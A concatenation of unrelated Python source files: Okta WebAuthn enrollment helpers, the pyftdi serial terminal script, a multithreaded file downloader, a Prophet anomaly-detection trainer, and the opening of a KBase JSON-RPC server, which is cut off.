self._okta_org_url + '/login/second-factor?fromURI=%2Fenduser%2Fsettings&forcePrompt=true&hideBgImage=true',
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return response
def _activate_webauthn_factor(self, state_token):
enrollment_response = self._enroll_factor(state_token)
response_json = enrollment_response.json()
next_link = response_json['_links']['next']
if next_link['name'] != 'activate':
raise RuntimeError('Expected next link to be an activation link, actually got: ' + next_link["name"])
factor_obj = response_json['_embedded']['factor']
activation_obj = factor_obj['_embedded']['activation']
challenge = activation_obj.get('challenge')
user_obj = activation_obj.get('user', {})
webauthn_client = WebAuthnClient(self.ui, self._okta_org_url, challenge)
client_data_json, attestation = webauthn_client.make_credential(user_obj)
client_data = str(base64.urlsafe_b64encode(client_data_json), 'utf-8')
attestation_data = str(base64.urlsafe_b64encode(attestation), 'utf-8')
response = self._http_client.post(
next_link['href'],
json={"stateToken": state_token, "clientData": client_data, "attestation": attestation_data},
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
session_token = response.json()['sessionToken']
redirect_url = quote(self._okta_org_url + '/enduser/settings?enrolledFactor=FIDO_WEBAUTHN')
response = self._http_client.get(
self._okta_org_url + '/login/sessionCookieRedirect?checkAccountSetupComplete=true&'
'token={session_token}&redirectUrl={redirect_url}'.format(session_token=session_token,
redirect_url=redirect_url),
headers=self._get_headers(), verify=self._verify_ssl_certs)
response.raise_for_status()
return attestation.auth_data.credential_data.credential_id, user_obj.get('name', 'gimme-aws-creds')
def _enroll_factor(self, state_token):
factors = self._introspect_factors(state_token)
if len(factors) != 1:
raise RuntimeError('Expected the state token to request enrollment for a specific factor')
# The state token should be set to return a specific factor
webauthn_factor = factors[0]
response = self._http_client.post(
webauthn_factor['_links']['enroll']['href'],
json={"stateToken": state_token, "factorType": webauthn_factor['factorType'],
"provider": webauthn_factor['provider']},
headers=self._get_headers(),
verify=self._verify_ssl_certs
)
response.raise_for_status()
return response
def _introspect_factors(self, state_token):
response = self._http_client.post(self._okta_org_url + '/api/v1/authn/introspect',
json={"stateToken": state_token}, headers=self._get_headers(),
verify=self._verify_ssl_certs)
response.raise_for_status()
factors = response.json()['_embedded']['factors']
if not factors:
raise RuntimeError('Could not introspect factors')
return factors
@staticmethod
def _extract_state_token_from_http_response(http_res):
saml_soup = BeautifulSoup(http_res.text, "html.parser")
if hasattr(saml_soup.title, 'string') and re.match(".* - Extra Verification$", saml_soup.title.string):
# extract the stateToken from the Javascript code in the page and step up to MFA
# noinspection PyTypeChecker
state_token = decode(re.search(r"var stateToken = '(.*)';", http_res.text).group(1), "unicode-escape")
return state_token
for tag in saml_soup.find_all('body'):
# checking all the tags in body tag for Extra Verification string
if re.search(r"Extra Verification", tag.text, re.IGNORECASE):
# extract the stateToken from response (form action) instead of javascript variable
# noinspection PyTypeChecker
pre_state_token = decode(re.search(r"stateToken=(.*?[ \"])", http_res.text).group(1), "unicode-escape")
state_token = pre_state_token.rstrip('\"')
return state_token
return None
|
pyterm.py
|
#!/home/pi/repos/gateway_pi/virtual/bin/python
"""Simple Python serial terminal
"""
# Copyright (c) 2010-2020, Emmanuel Blot <emmanuel.blot@free.fr>
# Copyright (c) 2016, Emmanuel Bouaziz <ebouaziz@free.fr>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Neotion nor the names of its contributors may
# be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL NEOTION BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#pylint: disable-msg=too-many-instance-attributes
#pylint: disable-msg=too-many-arguments
#pylint: disable-msg=too-many-nested-blocks
#pylint: disable-msg=too-many-branches
#pylint: disable-msg=too-many-statements
#pylint: disable-msg=too-few-public-methods
#pylint: disable-msg=broad-except
#pylint: disable-msg=wrong-import-position
from argparse import ArgumentParser, FileType
from atexit import register
from collections import deque
from logging import Formatter, StreamHandler, DEBUG, ERROR
from os import environ, linesep, name as os_name, read as os_read, stat
from sys import modules, platform, stderr, stdin, stdout
from time import sleep
from threading import Event, Thread
from traceback import format_exc
from _thread import interrupt_main
MSWIN = platform == 'win32'
if not MSWIN:
from termios import TCSANOW, tcgetattr, tcsetattr
from pyftdi import FtdiLogger
from pyftdi.ftdi import Ftdi
from pyftdi.misc import to_bps, add_custom_devices
#pylint: disable-msg=invalid-name
#pylint: disable-msg=import-error
if os_name == 'nt':
import msvcrt
else:
msvcrt = None
#pylint: enable-msg=invalid-name
#pylint: enable-msg=import-error
class MiniTerm:
"""A mini serial terminal to demonstrate pyserial extensions"""
DEFAULT_BAUDRATE = 115200
def __init__(self, device, baudrate=None, parity=None, rtscts=False,
debug=False):
self._termstates = []
if not MSWIN and stdout.isatty():
self._termstates = [(fd, tcgetattr(fd)) for fd in
(stdin.fileno(), stdout.fileno(),
stderr.fileno())]
self._device = device
self._baudrate = baudrate or self.DEFAULT_BAUDRATE
self._port = self._open_port(self._device, self._baudrate, parity,
rtscts, debug)
self._resume = False
self._silent = False
self._rxq = deque()
self._rxe = Event()
self._debug = debug
register(self._cleanup)
def run(self, fullmode=False, loopback=False, silent=False,
localecho=False, autocr=False):
"""Switch to a pure serial terminal application"""
# wait forever, although Windows is stupid and does not signal Ctrl+C,
# so wait use a 1/2-second timeout that gives some time to check for a
# Ctrl+C break then polls again...
print('Entering minicom mode @ %d bps' % self._port.baudrate)
stdout.flush()
self._port.timeout = 0.5
self._resume = True
# start the reader (target to host direction) within a dedicated thread
args = [loopback]
if self._device.startswith('ftdi://'):
# with pyftdi/pyusb/libusb stack, there is no kernel buffering
# which means that a UART source with data burst may overflow the
# FTDI HW buffer while the SW stack is dealing with formatting
# and console output. Use an intermediate thread to pop out data
# out from the HW as soon as it is made available, and use a deque
# to serve the actual reader thread
args.append(self._get_from_source)
sourcer = Thread(target=self._sourcer)
sourcer.setDaemon(1)
sourcer.start()
else:
# regular kernel buffered device
args.append(self._get_from_port)
reader = Thread(target=self._reader, args=tuple(args))
reader.setDaemon(1)
reader.start()
# start the writer (host to target direction)
self._writer(fullmode, silent, localecho, autocr)
def _sourcer(self):
try:
while self._resume:
data = self._port.read(4096)
if not data:
continue
self._rxq.append(data)
self._rxe.set()
except Exception as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
def _get_from_source(self):
while not self._rxq and self._resume:
if self._rxe.wait(0.1):
self._rxe.clear()
break
if not self._rxq:
return bytearray()
return self._rxq.popleft()
def _get_from_port(self):
try:
return self._port.read(4096)
except OSError as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
except Exception as ex:
print(str(ex), file=stderr)
return bytearray()
def _reader(self, loopback, getfunc):
"""Loop forever, processing received serial data in terminal mode"""
try:
# Try to read as many bytes as possible at once, and use a short
# timeout to avoid blocking for more data
self._port.timeout = 0.050
while self._resume:
if self._silent:
sleep(0.25)
continue
data = getfunc()
if data:
stdout.write(data.decode('utf8', errors='replace'))
stdout.flush()
if loopback:
self._port.write(data)
except KeyboardInterrupt:
return
except Exception as exc:
print("Exception: %s" % exc)
if self._debug:
print(format_exc(chain=False), file=stderr)
interrupt_main()
def _writer(self, fullmode, silent, localecho, crlf=0):
"""Loop and copy console->serial until EOF character is found"""
while self._resume:
try:
char = getkey()
if MSWIN:
if ord(char) == 0x3:
raise KeyboardInterrupt()
if fullmode and ord(char) == 0x2: # Ctrl+B
self._cleanup()
return
if silent:
if ord(char) == 0x6: # Ctrl+F
self._silent = True
print('Silent\n')
continue
if ord(char) == 0x7: # Ctrl+G
self._silent = False
print('Reg\n')
continue
else:
if localecho:
stdout.write(char.decode('utf8', errors='replace'))
stdout.flush()
if crlf:
if char == b'\n':
self._port.write(b'\r')
if crlf > 1:
continue
self._port.write(char)
except KeyboardInterrupt:
if fullmode:
continue
print('%sAborting...' % linesep)
self._cleanup()
return
def _cleanup(self):
"""Cleanup resource before exiting"""
try:
self._resume = False
if self._port:
# wait till the other thread completes
sleep(0.5)
try:
rem = self._port.inWaiting()
except IOError:
# maybe a bug in underlying wrapper...
rem = 0
# consumes all the received bytes
for _ in range(rem):
self._port.read()
self._port.close()
self._port = None
print('Bye.')
for tfd, att in self._termstates:
tcsetattr(tfd, TCSANOW, att)
except Exception as ex:
print(str(ex), file=stderr)
@staticmethod
def _open_port(device, baudrate, parity, rtscts, debug=False):
"""Open the serial communication port"""
try:
from serial.serialutil import SerialException
from serial import PARITY_NONE
except ImportError:
raise ImportError("Python serial module not installed")
try:
from serial import serial_for_url, VERSION as serialver
version = tuple([int(x) for x in serialver.split('.')])
if version < (3, 0):
raise ValueError
except (ValueError, IndexError, ImportError):
raise ImportError("pyserial 3.0+ is required")
# the following import enables serial protocol extensions
if device.startswith('ftdi:'):
try:
from pyftdi import serialext
serialext.touch()
except ImportError:
raise ImportError("PyFTDI module not installed")
try:
port = serial_for_url(device,
baudrate=baudrate,
parity=parity or PARITY_NONE,
rtscts=rtscts,
timeout=0)
if not port.is_open:
port.open()
if not port.is_open:
raise IOError('Cannot open port "%s"' % device)
if debug:
backend = port.BACKEND if hasattr(port, 'BACKEND') else '?'
print("Using serial backend '%s'" % backend)
return port
except SerialException as exc:
raise IOError(str(exc))
def get_default_device() -> str:
"""Return the default comm device, depending on the host/OS."""
envdev = environ.get('FTDI_DEVICE', '')
if envdev:
return envdev
if platform == 'win32':
device = 'COM1'
elif platform == 'darwin':
device = '/dev/cu.usbserial'
elif platform == 'linux':
device = '/dev/ttyS0'
else:
device = ''
try:
stat(device)
except OSError:
device = 'ftdi:///1'
return device
def init_term(fullterm: bool) -> None:
"""Internal terminal initialization function"""
if os_name == 'nt':
return True
if os_name == 'posix':
import termios
tfd = stdin.fileno()
old = termios.tcgetattr(tfd)
new = termios.tcgetattr(tfd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
if fullterm:
new[6][termios.VINTR] = 0
new[6][termios.VSUSP] = 0
termios.tcsetattr(tfd, termios.TCSANOW, new)
def cleanup_console():
termios.tcsetattr(tfd, termios.TCSAFLUSH, old)
# terminal modes have to be restored on exit...
register(cleanup_console)
return True
else:
return True
def getkey() -> str:
"""Return a key from the current console, in a platform independent way"""
# there's probably a better way to initialize the module without
# relying onto a singleton pattern. To be fixed
if os_name == 'nt':
# w/ py2exe, it seems the importation fails to define the global
# symbol 'msvcrt', to be fixed
while 1:
char = msvcrt.getch()
if char == '\3':
raise KeyboardInterrupt('Ctrl-C break')
if char == '\0':
msvcrt.getch()
else:
if char == '\r':
return '\n'
return char
elif os_name == 'posix':
char = os_read(stdin.fileno(), 1)
return char
else:
import time
time.sleep(1)
return None
def is_term():
"""Tells whether the current stdout/stderr stream are connected to a
terminal (vs. a regular file or pipe)"""
return stdout.isatty()
def is_colorterm():
"""Tells whether the current terminal (if any) support colors escape
sequences"""
terms = ['xterm-color', 'ansi']
return stdout.isatty() and environ.get('TERM') in terms
def main():
"""Main routine"""
debug = False
try:
default_device = get_default_device()
argparser = ArgumentParser(description=modules[__name__].__doc__)
if platform != 'win32':
argparser.add_argument('-f', '--fullmode', dest='fullmode',
action='store_true',
help='use full terminal mode, exit with '
'[Ctrl]+B')
argparser.add_argument('device', nargs='?', default=default_device,
help='serial port device name (default: %s)' %
default_device)
argparser.add_argument('-b', '--baudrate',
help='serial port baudrate (default: %d)' %
MiniTerm.DEFAULT_BAUDRATE,
default='%s' % MiniTerm.DEFAULT_BAUDRATE)
argparser.add_argument('-w', '--hwflow',
action='store_true',
help='hardware flow control')
argparser.add_argument('-e', '--localecho',
action='store_true',
help='local echo mode (print all typed chars)')
argparser.add_argument('-r', '--crlf',
action='count', default=0,
help='prefix LF with CR char, use twice to '
'replace all LF with CR chars')
argparser.add_argument('-l', '--loopback',
action='store_true',
help='loopback mode (send back all received '
'chars)')
argparser.add_argument('-s', '--silent', action='store_true',
help='silent mode')
argparser.add_argument('-P', '--vidpid', action='append',
help='specify a custom VID:PID device ID, '
'may be repeated')
argparser.add_argument('-V', '--virtual', type=FileType('r'),
help='use a virtual device, specified as YaML')
argparser.add_argument('-v', '--verbose', action='count',
help='increase verbosity')
argparser.add_argument('-d', '--debug', action='store_true',
help='enable debug mode')
args = argparser.parse_args()
debug = args.debug
if not args.device:
argparser.error('Serial device not specified')
loglevel = max(DEBUG, ERROR - (10 * (args.verbose or 0)))
loglevel = min(ERROR, loglevel)
if debug:
formatter = Formatter('%(asctime)s.%(msecs)03d %(name)-20s '
'%(message)s', '%H:%M:%S')
else:
formatter = Formatter('%(message)s')
FtdiLogger.set_formatter(formatter)
FtdiLogger.set_level(loglevel)
FtdiLogger.log.addHandler(StreamHandler(stderr))
if args.virtual:
from pyftdi.usbtools import UsbTools
# Force PyUSB to use PyFtdi test framework for USB backends
UsbTools.BACKENDS = ('pyftdi.tests.backend.usbvirt', )
# Ensure the virtual backend can be found and is loaded
backend = UsbTools.find_backend()
loader = backend.create_loader()()
loader.load(args.virtual)
try:
add_custom_devices(Ftdi, args.vidpid)
except ValueError as exc:
argparser.error(str(exc))
init_term(args.fullmode)
miniterm = MiniTerm(device=args.device,
baudrate=to_bps(args.baudrate),
parity='N',
rtscts=args.hwflow,
debug=args.debug)
miniterm.run(args.fullmode, args.loopback, args.silent, args.localecho,
args.crlf)
except (IOError, ValueError) as exc:
print('\nError: %s' % exc, file=stderr)
if debug:
print(format_exc(chain=False), file=stderr)
exit(1)
except KeyboardInterrupt:
exit(2)
if __name__ == '__main__':
main()
|
download.py
|
import os
import requests
import threading
import psutil
# Todo: Create a better stoppable thread class.
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self):
super(StoppableThread, self).__init__()
self._stop_event = threading.Event()
def stop(self):
self._stop_event.set()
def stopped(self):
return self._stop_event.is_set()
class Download():
"""
Class for downloading content from the web more than the speed of light! (jk)
"""
def __init__(self, url, filename="Default",path="/Downloads"):
self._cores = psutil.cpu_count()
self.url = url
self.saveas = filename
self.path = path
def get_cores(self):
"""
Function to return the number of cores.
"""
return self._cores
def _download_chunk(self, headers, start):
obj = requests.get(self.url,headers,stream = True)
f = open(self.saveas,"ab+")
f.seek(start)
f.write(obj.content)
f.close()
def download(self,s_thread = False):
"""
Method for downloading the given content.
"""
response_obj = requests.head(self.url)
if 'content-length' not in response_obj.headers.keys():
raise ValueError('Invalid URL.')
file_size = int(response_obj.headers['content-length'])
self._file_size = file_size
if file_size == 0:
raise ValueError('Download Error: File Size is 0kB, either the file is too small or the URL is invalid.')
path = os.path.expanduser('~') + self.path
os.chdir(path)
# Single thread
if s_thread == True:
headers = {'Range': 'bytes=%d-%d' % (0, file_size)}
self._download_chunk(headers,0)
return
# multi-thread
chunk = file_size // self._cores
self._chunksize = chunk
for i in range(self._cores):
start = chunk*i
end = start + chunk
if i == self._cores-1:
end = file_size
# print(start,end)
headers = {'Range': 'bytes=%d-%d' % (start, end)}
thread = threading.Thread(target=self._download_chunk, args= (headers, start))
thread.setDaemon(True)
thread.start()
main = threading.current_thread()
for t in threading.enumerate():
if t is main:
continue
t.join()
def get_chunk_size():
return self._chunksize
def get_filesize():
return self._file_size
|
prophet_model.py
|
from pandas import DataFrame, Series
from fbprophet import Prophet
import random
import numpy as np
from itertools import product
import pandas as pd
import threading
from multiprocessing import cpu_count
from functions import *
from utils import *
from logger import LoggerProcess
def get_anomaly(fact, yhat_upper, yhat_lower):
ad = Series([0, 0])
if fact > yhat_upper:
ad = Series([1, abs((fact - yhat_upper) / fact)])
if fact < yhat_lower:
ad = Series([1, abs((yhat_lower - fact)/ fact)])
return ad
def get_anomaly_score(anomaly, fact, yhat_upper, yhat_lower):
if anomaly == 1:
return abs((fact - yhat_upper) / fact)
if anomaly == -1:
return abs((yhat_lower - fact)/ fact)
def get_tuning_params(parameter_tuning, params, job):
arrays = []
for p in params:
if p not in list(parameter_tuning.keys()):
arrays.append([params[p]])
else:
arrays.append(
np.arange(float(parameter_tuning[p].split("*")[0]),
float(parameter_tuning[p].split("*")[1]),
float(parameter_tuning[p].split("*")[0])).tolist()
)
comb_arrays = list(product(*arrays))
if job != 'parameter_tuning':
return random.sample(comb_arrays, int(len(comb_arrays)*0.5))
else:
return comb_arrays
def get_params(params, comb):
count = 0
for p in params:
_p = type(params[p])(comb[count])
params[p] = _p
count += 1
return params
def mean_absolute_percentage_error(y_true, y_pred):
y_true, y_pred = np.array(y_true), np.array(y_pred)
return np.mean(np.abs((y_true - y_pred) / y_true)) * 100
class TrainProphet:
def __init__(self,
job=None, groups=None, time_indicator=None, feature=None,
data_source=None, data_query_path=None, time_period=None):
self.job = job
self.params = hyper_conf('prophet')
self.combination_params = hyper_conf('prophet_cp')
self.hyper_params = hyper_conf('prophet_pt')
self.optimized_parameters = {}
self._p = None
self.levels_tuning = get_tuning_params(self.hyper_params, self.params, self.job)
self.query_date = get_query_date(job, period=time_period, dates=None, params=self.params)
self.data, self.groups = data_manipulation(job=job,
date=self.query_date,
time_indicator=time_indicator,
feature=feature,
data_source=data_source,
groups=groups,
data_query_path=data_query_path)
self.date = time_indicator
self.f_w_data = self.data
self.split_date = get_split_date(period=time_period, dates=list(self.data[self.date]), params=self.params)
self.feature = feature
self.anomaly = []
self.model = None
self.count = 1
self.levels = get_levels(self.data, self.groups)
self.logger = LoggerProcess(job=job,
model='prophet',
total_process=len(self.levels)
if job != 'parameter_tuning' else len(self.levels_tuning))
self.comb = None
self.prediction = None
def get_query(self):
count = 0
query = ''
for c in self.comb:
if type(c) != str:
query += self.groups[count] + ' == ' + str(c) + ' and '
else:
query += self.groups[count] + " == '" + str(c) + "' and "
count += 1
query = query[:-4]
return query
def get_related_params(self):
self._p = self.params if self.combination_params is None else self.combination_params[self.get_param_key()]
def convert_date_feature_column_for_prophet(self):
renaming = {self.date: 'ds', self.feature: 'y'}
self.f_w_data = self.f_w_data.rename(columns=renaming)
self.f_w_data['ds'] = self.f_w_data['ds'].apply(lambda x: datetime.datetime.strptime(str(x)[0:19], '%Y-%m-%d %H:%M:%S'))
return self.f_w_data
def fit_predict_model(self, save_model=True):
self.f_w_data = self.convert_date_feature_column_for_prophet()
self.model = Prophet(daily_seasonality=False, yearly_seasonality=False, weekly_seasonality=False,
seasonality_mode='multiplicative',
interval_width=float(self._p['interval_width']),
changepoint_range=float(self._p['changepoint_range']),
n_changepoints=int(self._p['n_changepoints'])
).fit(self.f_w_data[['ds', 'y']])
if save_model:
model_from_to_pkl(directory=conf('model_main_path'),
path=model_path(self.comb, self.groups, 'prophet'),
model=self.model, is_writing=True)
def detect_anomalies(self):
self.model = model_from_to_pkl(directory=conf('model_main_path'),
path=model_path(self.comb, self.groups, 'prophet'))
try:
self.prediction = self.model.predict(self.convert_date_feature_column_for_prophet())
self.f_w_data = pd.merge(self.f_w_data,
self.prediction.rename(columns={'ds': self.date}),
on=self.date,
how='left')
self.f_w_data = self.f_w_data[self.f_w_data[self.date] >= self.split_date]
self.f_w_data[['ad_label_3', 'anomaly_score_3']] = self.f_w_data.apply(lambda row:
get_anomaly(row[self.feature],
row['yhat_upper'],
row['yhat_lower']), axis=1)
self.anomaly += self.f_w_data[['ad_label_3', self.date, 'anomaly_score_3'] + self.groups].to_dict("results")
print(self.f_w_data[['ad_label_3', self.date, 'anomaly_score_3'] + self.groups])
except Exception as e:
print(e)
def train_execute(self):
if not hyper_conf('prophet_has_param_tuning_first_run'):
self.parameter_tuning()
for self.comb in self.levels:
print("*" * 4, "PROPHET - ", self.get_query().replace(" and ", "; ").replace(" == ", " - "), "*" * 4)
self.f_w_data = self.data.query(self.get_query()).sort_values(by=self.date)
print("data size :", len(self.f_w_data))
self.convert_date_feature_column_for_prophet()
self.get_related_params()
self.fit_predict_model()
self.logger.counter()
if not check_request_stoped(self.job):
break
def prediction_execute(self):
for self.comb in self.levels:
print("*" * 4, "PROPHET - ", self.get_query().replace(" and ", "; ").replace(" == ", " - "), "*" * 4)
if check_model_exists(model_path(self.comb, self.groups, 'prophet'), conf('model_main_path')):
self.f_w_data = self.data.query(self.get_query()).sort_values(by=self.date)
print("prediction size :", len(self.f_w_data))
self.detect_anomalies()
self.logger.counter()
if not check_request_stoped(self.job):
break
self.anomaly = DataFrame(self.anomaly)
def process_execute(self, pr, count):
self.get_related_params()
self._p = get_params(self._p, pr)
print("hyper parameters : ", self._p)
self.convert_date_feature_column_for_prophet()
self.fit_predict_model(save_model=False)
self.prediction = self.model.predict(self.convert_date_feature_column_for_prophet())
error[count] = mean_absolute_percentage_error(self.f_w_data['y'], abs(self.prediction['yhat']))
def parameter_tuning_threading(self, has_comb=True):
global error
error = {}
_optimized_parameters = None
err = 100000000
self.f_w_data = self.data.query(self.get_query()).sort_values(by=self.date) if has_comb else self.f_w_data
self.f_w_data = self.f_w_data[-int(0.1 * len(self.f_w_data)):]
for iter in range(int(len(self.levels_tuning) / cpu_count())):
_levels = self.levels_tuning[(iter * cpu_count()):((iter + 1) * cpu_count())]
for i in range(len(_levels)):
self.logger.counter()
process = threading.Thread(target=self.process_execute, daemon=True, args=(_levels[i], i, ))
process.start()
process.join()
for i in error:
if i in list(error.keys()):
if error[i] < err:
err = error[i]
_optimized_parameters = get_params(self.params, _levels[i])
return _optimized_parameters
def get_param_key(self):
return "_".join([str(i[0]) + "*" + str(i[1]) for i in zip(self.groups, self.comb)])
def parameter_tuning(self):
if len(self.levels) == 0:
self.optimized_parameters = self.parameter_tuning_threading(has_comb=False)
else:
for self.comb in self.levels:
self.optimized_parameters[self.get_param_key()] = self.parameter_tuning_threading()
if not check_request_stoped(self.job):
break
print("updating model parameters")
pt_config = read_yaml(conf('docs_main_path'), 'parameter_tunning.yaml')
pt_config['has_param_tuning_first_run']['prophet'] = True
_key = 'hyper_parameters' if len(self.levels) == 0 else 'combination_params'
pt_config[_key]['prophet'] = self.optimized_parameters
write_yaml(conf('docs_main_path'), "parameter_tunning.yaml", pt_config, ignoring_aliases=True)
self.params = hyper_conf('prophet')
self.combination_params = hyper_conf('prophet_cp')
|
kbdeleonContigFilterServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from kbdeleonContigFilter.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kbdeleonContigFilter'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kbdeleonContigFilter.kbdeleonContigFilterImpl import kbdeleonContigFilter # noqa @IgnorePep8
impl_kbdeleonContigFilter = kbdeleonContigFilter(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
